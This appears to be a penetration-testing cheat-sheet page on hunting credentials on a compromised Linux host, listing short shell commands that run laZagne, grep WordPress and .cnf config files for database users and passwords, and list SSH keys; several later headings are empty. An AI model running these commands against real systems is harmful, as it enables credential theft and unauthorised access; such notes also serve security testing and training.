search
LinkedInGithub
githubEdit

credential-hunting

hashtag
Automatic cred enum

laZagne.py

hashtag
Get mysql database credentials

cat $(find / -name wp-config.php 2>/dev/null) | grep 'DB_USER\|DB_PASSWORD'

hashtag
Get config files

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

hashtag
Get ssh keys

ls ~/.ssh

hashtag
Config file hunting

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

hashtag
Credentials in config file

for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

hashtag
Interesting strings inside file

%s:%*phN\012

hashtag
Database file

hashtag
Note files

hashtag
Hunt scripts files

hashtag
Hunt private SSH keys

hashtag
Bash history

hashtag
Log files

Previouscredential-huntingNextcreds

Last updated